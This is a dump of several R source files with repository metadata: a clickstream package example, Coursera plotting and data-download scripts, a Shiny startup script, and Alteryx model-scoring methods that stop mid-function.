usethis::use_data(gimei, overwrite = TRUE)
|
library(clickstream)
### Name: readClickstreams
### Title: Reads a List of Clickstreams from File
### Aliases: readClickstreams
### ** Examples
# Each element is one session: an id followed by a comma-separated sequence
# of click states.
clickstreams <- c("User1,h,c,c,p,c,h,c,p,p,c,p,p,o",
"User2,i,c,i,c,c,c,d",
"User3,h,i,c,i,c,p,c,c,p,c,c,i,d",
"User4,c,c,p,c,d",
"User5,h,c,c,p,p,c,p,p,p,i,p,o",
"User6,i,h,c,c,p,p,c,p,c,d")
# Write the sessions to a temporary file, then read them back as a
# clickstream list; header = TRUE uses the first field as the session name
# (see ?readClickstreams).
csf <- tempfile()
writeLines(clickstreams, csf)
cls <- readClickstreams(csf, header = TRUE)
print(cls)
| /data/genthat_extracted_code/clickstream/examples/readClickstreams.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 523 | r | library(clickstream)
### Name: readClickstreams
### Title: Reads a List of Clickstreams from File
### Aliases: readClickstreams
### ** Examples
# Each element is one session: an id followed by a comma-separated sequence
# of click states.
clickstreams <- c("User1,h,c,c,p,c,h,c,p,p,c,p,p,o",
"User2,i,c,i,c,c,c,d",
"User3,h,i,c,i,c,p,c,c,p,c,c,i,d",
"User4,c,c,p,c,d",
"User5,h,c,c,p,p,c,p,p,p,i,p,o",
"User6,i,h,c,c,p,p,c,p,c,d")
# Write the sessions to a temporary file, then read them back as a
# clickstream list; header = TRUE uses the first field as the session name
# (see ?readClickstreams).
csf <- tempfile()
writeLines(clickstreams, csf)
cls <- readClickstreams(csf, header = TRUE)
print(cls)
|
## Course 4: Exploratory Data Analysis
## Assignment: Course Project 1
## Student: Brenda Cooney
## Plot: Plot 4
## Check to see if the data file exists in the current folder.
## If it doesn't then download it, else do not.
## Note: I could bring this much further and check to ensure the file is readable
## but it's not part of the exercise so I'm leaving it out!
if(!file.exists("household_power_consumption.txt")) {
## Create a temporary file that will hold the zipped file
tempfile <- tempfile()
URL <- "https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip"
## Download the zipped file, unzip and store the contents in the current directory
download.file(URL, tempfile, method = "curl")
unzip(tempfile)
unlink(tempfile) ## Remove the temporary file from memory
}
## Name of file in zipped folder
fileName <- "household_power_consumption.txt"
## Read the data in a data.frame and set its column names and types.
## Skip the first 66638 rows and then read in the rows where the date is
## '2007-02-01' or '2007-02-02' (skip/nrows are hard-coded for this file).
data <- read.table(file=fileName,
sep=";", col.names=c("Date", "Time", "Global_active_power",
"Global_reactive_power", "Voltage",
"Global_intensity", "Sub_metering_1",
"Sub_metering_2", "Sub_metering_3"),
colClasses = c("character", "character", "numeric",
"numeric", "numeric", "numeric",
"numeric", "numeric", "numeric"),
skip=66638,
nrows=2879,
stringsAsFactors = FALSE)
## Combine 'Date' and 'Time' and store result in a new column 'DateTime'
data_set_newCol <- cbind(data, DateTime=paste(data$Date, data$Time), stringsAsFactors = FALSE)
## Drop the 'Date' and 'Time' columns, keeping the measurements plus 'DateTime'
data_set <- data_set_newCol[,3:10]
## Remove data no longer needed
remove(data, data_set_newCol)
## Convert 'DateTime' from character to a date-time value
data_set$DateTime <- strptime(data_set$DateTime, "%d/%m/%Y %H:%M:%S")
## Open the 'png' graphics device; create 'plot4.png' in the working directory
png(file="plot4.png", width = 480, height = 480, units="px")
## Specify the number of rows and columns of plots (a 2 x 2 grid)
par(mfrow=c(2,2))
## Create 'Plot1': Global Active Power over time
plot(data_set$DateTime, data_set$Global_active_power, type="l",
xlab="", ylab="Global Active Power")
## Create 'Plot2': Voltage over time
plot(data_set$DateTime, data_set$Voltage, type="l",
xlab="datetime", ylab="Voltage")
## Create 'Plot3': the three sub-metering series, with a legend
plot(data_set$DateTime, data_set$Sub_metering_1, type="l",
xlab="", ylab="Energy sub metering")
legend("topright", legend=c("Sub_metering_1", "Sub_metering_2",
"Sub_metering_3"), bty="n", cex=1, lwd=1, col=c("black","red","blue"))
points(data_set$DateTime, data_set$Sub_metering_2, type="l", col = "red")
points(data_set$DateTime, data_set$Sub_metering_3, type="l", col = "blue")
## Create 'Plot4': Global Reactive Power over time
plot(data_set$DateTime, data_set$Global_reactive_power, type="l",
xlab="datetime", ylab="Global_reactive_power")
dev.off() ## Close the 'png' device that was opened above
| /r_code/plot4.R | no_license | brenda-cooney/ExData_Plotting1 | R | false | false | 3,304 | r | ## Course 4: Exploratory Data Analysis
## Assignment: Course Project 1
## Student: Brenda Cooney
## Plot: Plot 4
## Check to see if the data file exists in the current folder.
## If it doesn't then download it, else do not.
## Note: I could bring this much further and check to ensure the file is readable
## but it's not part of the exercise so I'm leaving it out!
if(!file.exists("household_power_consumption.txt")) {
## Create a temporary file that will hold the zipped file
tempfile <- tempfile()
URL <- "https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip"
## Download the zipped file, unzip and store the contents in the current directory
download.file(URL, tempfile, method = "curl")
unzip(tempfile)
unlink(tempfile) ## Remove the temporary file from memory
}
## Name of file in zipped folder
fileName <- "household_power_consumption.txt"
## Read the data in a data.frame and set its column names and types.
## Skip the first 66638 rows and then read in the rows where the date is
## '2007-02-01' or '2007-02-02' (skip/nrows are hard-coded for this file).
data <- read.table(file=fileName,
sep=";", col.names=c("Date", "Time", "Global_active_power",
"Global_reactive_power", "Voltage",
"Global_intensity", "Sub_metering_1",
"Sub_metering_2", "Sub_metering_3"),
colClasses = c("character", "character", "numeric",
"numeric", "numeric", "numeric",
"numeric", "numeric", "numeric"),
skip=66638,
nrows=2879,
stringsAsFactors = FALSE)
## Combine 'Date' and 'Time' and store result in a new column 'DateTime'
data_set_newCol <- cbind(data, DateTime=paste(data$Date, data$Time), stringsAsFactors = FALSE)
## Drop the 'Date' and 'Time' columns, keeping the measurements plus 'DateTime'
data_set <- data_set_newCol[,3:10]
## Remove data no longer needed
remove(data, data_set_newCol)
## Convert 'DateTime' from character to a date-time value
data_set$DateTime <- strptime(data_set$DateTime, "%d/%m/%Y %H:%M:%S")
## Open the 'png' graphics device; create 'plot4.png' in the working directory
png(file="plot4.png", width = 480, height = 480, units="px")
## Specify the number of rows and columns of plots (a 2 x 2 grid)
par(mfrow=c(2,2))
## Create 'Plot1': Global Active Power over time
plot(data_set$DateTime, data_set$Global_active_power, type="l",
xlab="", ylab="Global Active Power")
## Create 'Plot2': Voltage over time
plot(data_set$DateTime, data_set$Voltage, type="l",
xlab="datetime", ylab="Voltage")
## Create 'Plot3': the three sub-metering series, with a legend
plot(data_set$DateTime, data_set$Sub_metering_1, type="l",
xlab="", ylab="Energy sub metering")
legend("topright", legend=c("Sub_metering_1", "Sub_metering_2",
"Sub_metering_3"), bty="n", cex=1, lwd=1, col=c("black","red","blue"))
points(data_set$DateTime, data_set$Sub_metering_2, type="l", col = "red")
points(data_set$DateTime, data_set$Sub_metering_3, type="l", col = "blue")
## Create 'Plot4': Global Reactive Power over time
plot(data_set$DateTime, data_set$Global_reactive_power, type="l",
xlab="datetime", ylab="Global_reactive_power")
dev.off() ## Close the 'png' device that was opened above
|
# Shiny app startup script (global.r): runs once when the app launches.
# NOTE(review): clearing the workspace and hard-coding an absolute path are
# fragile outside the original author's machine -- confirm before reuse.
rm(list = setdiff(ls(), lsf.str()))
setwd("/Users/tabuwalda/Documents/2015LearnLabSummerSchool/ShinyApp/LatencyLearningCurves/")
library(lme4)
library(dplyr)
# Print dplyr data frames at full width.
options(dplyr.width = Inf)
source("helpers.r")
# Pre-computed data used by the app (presumably knowledge-component lists,
# given the name listKCShiny -- confirm).
load("./Data/listKCShiny.Rdat")
oldModels <- NULL
cat("\n\n\n")
| /LatencyLearningCurves/global.r | no_license | TBuwalda/LatencyLC | R | false | false | 274 | r | rm(list = setdiff(ls(), lsf.str()))
# Shiny app startup script (global.r), continued.
# NOTE(review): the hard-coded absolute path is fragile outside the original
# author's machine -- confirm before reuse.
setwd("/Users/tabuwalda/Documents/2015LearnLabSummerSchool/ShinyApp/LatencyLearningCurves/")
library(lme4)
library(dplyr)
# Print dplyr data frames at full width.
options(dplyr.width = Inf)
source("helpers.r")
# Pre-computed data used by the app (presumably knowledge-component lists,
# given the name listKCShiny -- confirm).
load("./Data/listKCShiny.Rdat")
oldModels <- NULL
cat("\n\n\n")
|
## rm(list=ls())
## Set your own working directory
wd <- "C:/Users/Max/Dropbox/Health-IT/coursera/Data Science - Johns Hopkins University/Course 4 - Exploaratory Data Analysis"
setwd(wd)
## Create the data directory if it does not exist yet, then move into it
data_dir <- "data"
if(!file.exists(data_dir)){dir.create(data_dir)}
setwd(file.path(wd,data_dir))
## Download data zip file and unzip it
##
fn <- "dataset.zip"
fUrl <- "https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip"
download.file(fUrl,fn,method="curl")
unzip(zipfile=fn)
## Read data from the files into the variables
##
datafile <- "household_power_consumption.txt"
## FIX: install sqldf only when it is missing, instead of unconditionally
## reinstalling the package on every run of the script.
if (!requireNamespace("sqldf", quietly = TRUE)) install.packages("sqldf")
library(sqldf)
## Keep only the rows for the two analysis days (1 and 2 Feb 2007)
hhpc <- read.csv.sql(datafile, sql="select * from file where `Date` In ('1/2/2007','2/2/2007')",header=TRUE,sep=";")
## Convert dates: combine Date and Time, parse, and store as POSIXct in DT
datetime <- strptime(paste(hhpc$Date, hhpc$Time, sep=" "),"%d/%m/%Y %H:%M:%S")
hhpc$DT <- as.POSIXct(datetime)
| /plot_prepare_data.R | no_license | Camphausen/ExData_Plotting1 | R | false | false | 915 | r | ## rm(list=ls())
## Set your own working directory
wd <- "C:/Users/Max/Dropbox/Health-IT/coursera/Data Science - Johns Hopkins University/Course 4 - Exploaratory Data Analysis"
setwd(wd)
## Create the data directory if it does not exist yet, then move into it
data_dir <- "data"
if(!file.exists(data_dir)){dir.create(data_dir)}
setwd(file.path(wd,data_dir))
## Download data zip file and unzip it
##
fn <- "dataset.zip"
fUrl <- "https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip"
download.file(fUrl,fn,method="curl")
unzip(zipfile=fn)
## Read data from the files into the variables
##
datafile <- "household_power_consumption.txt"
## FIX: install sqldf only when it is missing, instead of unconditionally
## reinstalling the package on every run of the script.
if (!requireNamespace("sqldf", quietly = TRUE)) install.packages("sqldf")
library(sqldf)
## Keep only the rows for the two analysis days (1 and 2 Feb 2007)
hhpc <- read.csv.sql(datafile, sql="select * from file where `Date` In ('1/2/2007','2/2/2007')",header=TRUE,sep=";")
## Convert dates: combine Date and Time, parse, and store as POSIXct in DT
datetime <- strptime(paste(hhpc$Date, hhpc$Time, sep=" "),"%d/%m/%Y %H:%M:%S")
hhpc$DT <- as.POSIXct(datetime)
|
#' Score function
#'
#' Generic for producing model scores (predictions) for new data; methods
#' dispatch on the class of the fitted model object.
#'
#' @param mod.obj model object
#' @param new.data new data to score
#' @param score.field name given to the score field
#' @param ... additional arguments
#' @return A data.frame of scores: one column for continuous targets, or one
#'   predicted-probability column per target level for categorical targets.
#' @export
#' @author Ramnath Vaidyanathan, Dan Putler, Bridget Toomey
#' @rdname scoreModel
scoreModel <- function(mod.obj, new.data, score.field = "Score", ...) {
UseMethod('scoreModel')
}
#' @param os.value oversampling value
#' @param os.pct oversampling percent
#' @param pred.int whether to generate prediction intervals
#' @param int.vals interval values
#' @param log.y whether to report y on the log scale
#' @return A data.frame with one score column (continuous target) or one
#'   predicted-probability column per target level (categorical target).
#' @export
#' @rdname scoreModel
scoreModel.default <- function(mod.obj, new.data, score.field = "Score",
  os.value = NULL, os.pct = NULL, ...){
  target.value <- os.value
  # Align factor levels of the new data with those seen at training time.
  new.data <- matchLevels(new.data, getXlevels(mod.obj))
  y.levels <- getYlevels(mod.obj, new.data)
  # FIX: use inherits() -- `class(mod.obj) == "earth"` yields a length > 1
  # condition (an error in R >= 4.2) when the object carries extra classes.
  if (inherits(mod.obj, "earth") && is.null(mod.obj$glm.list)) {
    stop.Alteryx2("Spline Models that did not use a GLM family cannot be scored")
  }
  if (is.null(y.levels)) {
    # Continuous target: a single column of point predictions.
    if (inherits(mod.obj, c("nnet.formula", "rpart", "svm"))) {
      scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data)))
    } else {
      if (class(mod.obj)[1] == "gbm") {
        scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data, type = "response", n.trees = mod.obj$best.trees)))
      } else {
        scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data, type = "response")))
      }
    }
    names(scores) <- score.field
  } else {
    # Categorical target: one predicted-probability column per level.
    if (!is.null(os.value)) {
      if (length(y.levels) != 2) {
        AlteryxRDataX::AlteryxMessage("Adjusting for the oversampling of the target is only valid for a binary categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
        scores <- data.frame(predProb(mod.obj, newdata = new.data))
      } else {
        # Undo the effect of oversampling the target level: reweight the
        # predicted probability by the ratio of sample to population rates.
        sample.pct <- samplePct(mod.obj, os.value, new.data)
        wr <- sample.pct/os.pct
        wc <- (100 - sample.pct)/(100 - os.pct)
        pred.prob <- predProb(mod.obj, new.data)[ , (1:2)[y.levels == os.value]]
        adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
        if (y.levels[1] == target.value) {
          scores <- data.frame(score1 = adj.prob, score2 = 1 - adj.prob)
        } else {
          scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
        }
      }
    } else {
      scores <- data.frame(predProb(mod.obj, new.data))
    }
    names(scores) <- paste0(score.field, "_", y.levels)
  }
  scores
}
# These model families share the default scoring method.
#' @export
scoreModel.glm <- scoreModel.default
#' @export
scoreModel.svyglm <- scoreModel.default
#' @export
scoreModel.negbin <- scoreModel.default
#' @export
#' @rdname scoreModel
scoreModel.lm <- function(mod.obj, new.data, score.field = "Score",
  pred.int = FALSE, int.vals = NULL, log.y = FALSE, ...) {
  # Score a linear model. With pred.int = TRUE a prediction interval at the
  # int.vals percent level is returned (columns <field>_fit/_lwr/_upr);
  # otherwise a single column of point predictions. When log.y = TRUE the
  # target is assumed to be natural-log transformed and Duan's smearing
  # estimator (mean of exp(residuals)) is applied after back-transforming.
  if (pred.int) {
    score <- as.data.frame(predict(mod.obj, newdata = new.data, level = 0.01*int.vals, interval = "predict"))
    if (log.y) {
      smear <- sum(exp(mod.obj$residuals))/length(mod.obj$residuals)
      score$fit <- exp(score$fit)*smear
      score$lwr <- exp(score$lwr)*smear
      score$upr <- exp(score$upr)*smear
    }
    # FIX: name the columns directly instead of via eval(parse(...)); this
    # also works for score.field values that are not syntactic R names.
    scores <- score
    names(scores) <- paste0(score.field, c("_fit", "_lwr", "_upr"))
  } else {
    score <- predict(mod.obj, newdata = new.data)
    if (log.y) {
      # If exponentiating would overflow to machine infinity the target was
      # most likely not log transformed: warn and skip the smearing
      # correction. (Outside Alteryx replace AlteryxMessage with message().)
      if (max(score) > 709) {
        AlteryxRDataX::AlteryxMessage("The target variable does not appear to have been natural log transformed, no correction was applied.", iType = 2, iPriority = 3)
      } else {
        score <- exp(score)*(sum(exp(mod.obj$residuals))/length(mod.obj$residuals))
      }
    }
    # FIX: avoid eval(parse(...)) when naming the single score column.
    scores <- data.frame(score)
    names(scores) <- score.field
  }
  scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxLogit <- function(mod.obj, new.data, score.field = "Score",
  os.value = NULL, os.pct = NULL, ...) {
  # Score a RevoScaleR logistic regression. rxPredict() returns the predicted
  # probability of the second target level (see the unadjusted branch below);
  # the result carries one probability column per target level.
  new.data <- matchLevels(new.data, mod.obj$xlevels)
  pred.prob <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "pred.prob")$pred.prob
  if (!is.null(os.value)) {
    # Undo the effect of oversampling the target level (os.value) at rate
    # os.pct, using the target's share of the training sample.
    target.value <- os.value
    num.target <- mod.obj$yinfo$counts[mod.obj$yinfo$levels == target.value]
    num.total <- sum(mod.obj$yinfo$counts)
    sample.pct <- 100*num.target / num.total
    wr <- sample.pct/os.pct
    wc <- (100 - sample.pct)/(100 - os.pct)
    # FIX: compare only the first level -- the original unsubscripted
    # comparison used a length-2 vector as the if() condition (an error in
    # R >= 4.2), cf. scoreModel.rxDTree which subscripts with [1].
    if (mod.obj$yinfo$levels[1] == target.value) {
      apr <- ((1 - pred.prob)/wr)/((1 - pred.prob)/wr + pred.prob/wc)
      scores <- data.frame(score1 = apr, score2 = 1 - apr)
    } else {
      adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
      scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
    }
  } else {
    scores <- data.frame(score1 = 1 - pred.prob, score2 = pred.prob)
  }
  # FIX: build the column names directly instead of via eval(parse(...)).
  names(scores) <- paste0(score.field, "_", mod.obj$yinfo$levels[1:2])
  scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxGlm <- function(mod.obj, new.data, score.field = "Score", ...) {
# Score a RevoScaleR GLM: response-scale predictions for new.data.
scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "score")$score
# NOTE(review): `scores` is a plain numeric vector here, so names()<- sets
# element names (padding beyond the first with NA) rather than a column name
# as in the other methods -- confirm whether a one-column data.frame was
# intended.
names(scores) <- score.field
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxLinMod <- function(mod.obj, new.data, score.field = "Score", pred.int = FALSE, int.vals = NULL, log.y = FALSE, ...) {
  # Score a RevoScaleR linear model. With pred.int = TRUE a prediction
  # interval at the int.vals percent level is returned (fit / lwr / upr);
  # with log.y = TRUE predictions are back-transformed using the smearing
  # adjustment stored on the model (mod.obj$smearing.adj).
  if (pred.int) {
    scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, computeStdErrors = TRUE, interval = "prediction", confLevel = 0.01*int.vals, type = "response")
    # Drop the standard-error column, keeping fit / lower / upper.
    scores <- scores[,-2]
    if (log.y)
      for (i in 1:3)
        scores[,i] <- exp(scores[[i]])*mod.obj$smearing.adj
    names(scores) <- paste0(score.field, "_", c("fit", "lwr", "upr"))
  } else {
    # NOTE(review): this branch returns a plain vector, unlike the
    # data.frame returned when pred.int = TRUE -- confirm callers handle it.
    scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "score")$score
    if (log.y) {
      if (is.null(mod.obj$smearing.adj)) {
        # FIX: corrected the "natrual" typo so the message matches the
        # identical warning issued by scoreModel.lm.
        AlteryxRDataX::AlteryxMessage("The target variable does not appear to have been natural log transformed, no correction was applied.", iType = 2, iPriority = 3)
      } else {
        scores <- exp(scores)*mod.obj$smearing.adj
      }
    }
  }
  scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxDTree <- function(mod.obj, new.data, score.field, os.value = NULL,
  os.pct = NULL, ...) {
  new.data <- matchLevels(new.data, mod.obj$xlevels)
  # Classification trees: yinfo is present and rxPredict returns one
  # probability column per target level.
  if (!is.null(mod.obj$yinfo)) {
    scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "prob")
    # FIX: use inherits() -- this method is reused for rxDForest objects and
    # `class(mod.obj) == "rxDForest"` produces a length > 1 condition (an
    # error in R >= 4.2) for objects carrying multiple classes.
    if (inherits(mod.obj, "rxDForest"))
      scores <- scores[, -(ncol(scores))]
    if (!is.null(os.value)) {
      if (ncol(scores) != 2) {
        AlteryxRDataX::AlteryxMessage("Adjusting for the oversampling of the target is only valid for a binary categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
      } else {
        # Undo the effect of oversampling the target level; target.loc picks
        # the target's own probability column.
        target.value <- os.value
        target.loc <- 2
        if (mod.obj$yinfo$levels[1] == target.value) {
          target.loc = 1
        }
        pred.prob <- scores[[target.loc]]
        num.target <- mod.obj$yinfo$counts[mod.obj$yinfo$levels == target.value]
        num.total <- sum(mod.obj$yinfo$counts)
        sample.pct <- 100*num.target / num.total
        wr <- sample.pct/os.pct
        wc <- (100 - sample.pct)/(100 - os.pct)
        # NOTE(review): pred.prob is already the target level's probability,
        # yet the first branch applies the (1 - pred.prob) formula copied
        # from scoreModel.rxLogit (where pred.prob is the second level's
        # probability) -- verify the adjustment when the target is level 1.
        if (mod.obj$yinfo$levels[1] == target.value) {
          apr <- ((1 - pred.prob)/wr)/((1 - pred.prob)/wr + pred.prob/wc)
          scores <- data.frame(score1 = apr, score2 = 1 - apr)
        } else {
          adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
          scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
        }
      }
    }
    # FIX: paste0 -- paste() with its default separator produced names like
    # "Score _ level" instead of "Score_level" as in the other methods.
    names(scores) <- paste0(score.field, "_", mod.obj$yinfo$levels)
  } else { # Regression trees: a single vector of predictions.
    scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, predVarNames = "score")$score
  }
  scores
}
# Random forests share the tree scoring method; scoreModel.rxDTree drops the
# extra rxDForest probability column before adjusting/naming the scores.
#' @export
#' @rdname scoreModel
scoreModel.rxDForest <- scoreModel.rxDTree
#' @export
#' @rdname scoreModel
scoreModel.elnet <- function(mod.obj, new.data, score.field = "Score", ...) {
  # The code in the score tool has already subsetted the columns of the
  # original data to be scored, so there's no need to subset in that case.
  # However, we need to perform the subsetting and column ordering in case of
  # future tools that might use scoreModel. Unfortunately, glmnet isn't smart
  # enough to order the columns correctly in the predict function if they're
  # provided in the wrong order.
  used_x_vars <- getXVars(mod.obj)
  new.data <- df2NumericMatrix(
    x = new.data,
    filtering_message = "Non-numeric variables are among the predictors. They are now being removed.",
    convertVectorToDataFrame = TRUE
  )
  # Refuse to score when any predictor used at training time is absent.
  if (!all(used_x_vars %in% colnames(new.data))) {
    missing_x_vars <- used_x_vars[!(used_x_vars %in% colnames(new.data))]
    if (length(missing_x_vars) == 1) {
      AlteryxPredictive::stop.Alteryx2(paste0("The incoming data stream is missing
the variable ", missing_x_vars, ". Please make
sure you provide this variable and try again."))
    } else {
      # FIX: collapse the vector of names into a single string -- paste0() on
      # a length > 1 vector produced a vector of messages instead of one
      # message listing all missing variables.
      AlteryxPredictive::stop.Alteryx2(paste0("The incoming data stream is missing
the variables ", paste(missing_x_vars, collapse = ", "), ". Please make
sure you provide these variables and try again."))
    }
  }
  used_data <- new.data[, used_x_vars]
  requireNamespace('glmnet')
  # Score at the lambda chosen at model-building time (mod.obj$lambda_pred).
  score <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred)
  score <- as.data.frame(score)
  names(score) <- score.field
  return(score)
}
#' @export
#' @rdname scoreModel
scoreModel.lognet <- function(mod.obj, new.data, score.field = "Score",
                              os.value = NULL, os.pct = NULL, ...) {
  # Subset/order predictors to match the training matrix; glmnet's predict()
  # does not reorder columns itself.
  used_x_vars <- getXVars(mod.obj)
  new.data <- df2NumericMatrix(
    x = new.data,
    filtering_message = "Non-numeric variables are among the predictors. They are now being removed.",
    convertVectorToDataFrame = TRUE
  )
  target.value <- os.value
  y.levels <- getYlevels(mod.obj)
  # Fail with one readable message listing every missing predictor (the
  # original paste0() call produced one fragment per missing variable).
  missing_x_vars <- setdiff(used_x_vars, colnames(new.data))
  if (length(missing_x_vars) > 0) {
    if (length(missing_x_vars) == 1) {
      msg <- paste0("The incoming data stream is missing the variable ",
                    missing_x_vars,
                    ". Please make sure you provide this variable and try again.")
    } else {
      msg <- paste0("The incoming data stream is missing the variables ",
                    paste(missing_x_vars, collapse = ", "),
                    ". Please make sure you provide these variables and try again.")
    }
    AlteryxPredictive::stop.Alteryx2(msg)
  }
  # drop = FALSE keeps a single-predictor model as a matrix for predict().
  used_data <- new.data[, used_x_vars, drop = FALSE]
  requireNamespace('glmnet')
  if (!is.null(os.value)) {
    if (length(y.levels) != 2) {
      AlteryxMessage2("Adjusting for the oversampling of the target is only valid for a binary
                      categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
      scores <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
      # predict() returns only the probability of the second class; column one
      # is its complement.
      scores <- data.frame(cbind((1 - scores), scores))
    } else {
      # Undo oversampling: reweight the probability of os.value from its
      # in-sample rate back to the population rate os.pct.
      sample.pct <- samplePct(mod.obj, os.value, new.data)
      wr <- sample.pct/os.pct
      wc <- (100 - sample.pct)/(100 - os.pct)
      pred.prob <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
      pred.prob <- as.data.frame(cbind((1 - pred.prob), pred.prob))
      pred.prob <- pred.prob[ , (1:2)[y.levels == os.value]]
      adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
      if (y.levels[1] == target.value) {
        scores <- data.frame(score1 = adj.prob, score2 = 1 - adj.prob)
      } else {
        scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
      }
    }
  } else {
    scores <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
    scores <- data.frame(cbind((1 - scores), scores))
  }
  names(scores) <- paste(score.field, "_", y.levels, sep = "")
  return(scores)
}
#' @export
#' @rdname scoreModel
scoreModel.cv.glmnet <- function(mod.obj, new.data, score.field = "Score",
                                 os.value = NULL, os.pct = NULL, ...) {
  # Dispatch on the type of the underlying glmnet fit, forwarding the caller's
  # arguments. Previously score.field, os.value and os.pct were re-hard-coded
  # to their defaults here, so any values the caller supplied were discarded.
  if (inherits(mod.obj$glmnet.fit, 'lognet')) {
    scoreModel.lognet(mod.obj, new.data, score.field = score.field,
                      os.value = os.value, os.pct = os.pct, ...)
  } else {
    scoreModel.elnet(mod.obj, new.data, score.field = score.field, ...)
  }
}
#Note: When doing this for logistic regression, I'll need to update to differentiate between
#elnet and lognet types. I can test whether mod.obj$glmnet.fit inherits elnet.
| /R/scoreModel.R | no_license | tmmorley/AlteryxPredictive | R | false | false | 13,829 | r | #' Score function
#'
#' Generic entry point for scoring a fitted model against new data. The actual
#' work is done by the class-specific methods (e.g. `scoreModel.lm`,
#' `scoreModel.rxLogit`); dispatch is on `class(mod.obj)`.
#'
#' @param mod.obj A fitted model object; its class selects the method used.
#' @param new.data A data.frame of new observations to score.
#' @param score.field Name (or name prefix, for classification methods) given
#'   to the score column(s) in the returned result.
#' @param ... Additional arguments passed on to the dispatched method.
#' @export
#' @author Ramnath Vaidyanathan, Dan Putler, Bridget Toomey
#' @rdname scoreModel
scoreModel <- function(mod.obj, new.data, score.field = "Score", ...) {
  UseMethod('scoreModel')
}
#' @param os.value oversampling value (the target level that was oversampled)
#' @param os.pct oversampling percent (population rate of `os.value`, 0-100)
#' @param pred.int whether to generate prediction intervals
#' @param int.vals interval values
#' @param log.y whether to report y on the log scale
#' @export
#' @rdname scoreModel
scoreModel.default <- function(mod.obj, new.data, score.field = "Score",
                               os.value = NULL, os.pct = NULL, ...){
  target.value <- os.value
  # Align the factor levels of the new data with those used to fit the model.
  new.data <- matchLevels(new.data, getXlevels(mod.obj))
  # NULL y.levels indicates a continuous target; otherwise the target levels.
  y.levels <- getYlevels(mod.obj, new.data)
  # inherits() is the robust class test: class() can return a multi-element
  # vector, which makes `==` unreliable here (and an error in `if` on R >= 4.2).
  if (inherits(mod.obj, "earth") && is.null(mod.obj$glm.list)) {
    stop.Alteryx2("Spline Models that did not use a GLM family cannot be scored")
  }
  if (is.null(y.levels)) {
    # Continuous target: a single column of predictions named `score.field`.
    if (inherits(mod.obj, c("nnet.formula", "rpart", "svm"))) {
      scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data)))
    } else {
      if (class(mod.obj)[1] == "gbm") {
        # gbm needs the number of trees selected during model assessment.
        scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data, type = "response", n.trees = mod.obj$best.trees)))
      } else {
        scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data, type = "response")))
      }
    }
    names(scores) <- score.field
  } else {
    # Categorical target: one predicted-probability column per target level.
    if (!is.null(os.value)) {
      if (length(y.levels) != 2) {
        AlteryxRDataX::AlteryxMessage("Adjusting for the oversampling of the target is only valid for a binary categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
        scores <- data.frame(predProb(mod.obj, newdata = new.data))
      } else {
        # Undo oversampling of the target class: reweight the predicted
        # probability of `os.value` back to the population rate `os.pct`.
        sample.pct <- samplePct(mod.obj, os.value, new.data)
        wr <- sample.pct/os.pct
        wc <- (100 - sample.pct)/(100 - os.pct)
        pred.prob <- predProb(mod.obj, new.data)[ , (1:2)[y.levels == os.value]]
        adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
        if (y.levels[1] == target.value) {
          scores <- data.frame(score1 = adj.prob, score2 = 1 - adj.prob)
        } else {
          scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
        }
      }
    } else {
      scores <- data.frame(predProb(mod.obj, new.data))
    }
    names(scores) <- paste(score.field, "_", y.levels, sep = "")
  }
  scores
}
# These GLM-family model classes are scored exactly like the default method.
#' @export
scoreModel.glm <- scoreModel.default
#' @export
scoreModel.svyglm <- scoreModel.default
#' @export
scoreModel.negbin <- scoreModel.default
#' @export
#' @rdname scoreModel
scoreModel.lm <- function(mod.obj, new.data, score.field = "Score",
                          pred.int = FALSE, int.vals = NULL, log.y = FALSE, ...) {
  # Duan's smearing estimator, mean(exp(residuals)): corrects retransformation
  # bias when the target was modeled on the natural-log scale. Computed once
  # instead of inline three times as before.
  smear <- mean(exp(mod.obj$residuals))
  if (pred.int) {
    # Point prediction plus a prediction interval at the requested confidence
    # level (int.vals is a percentage, e.g. 95).
    score <- as.data.frame(predict(mod.obj, newdata = new.data,
                                   level = 0.01 * int.vals, interval = "predict"))
    if (log.y) {
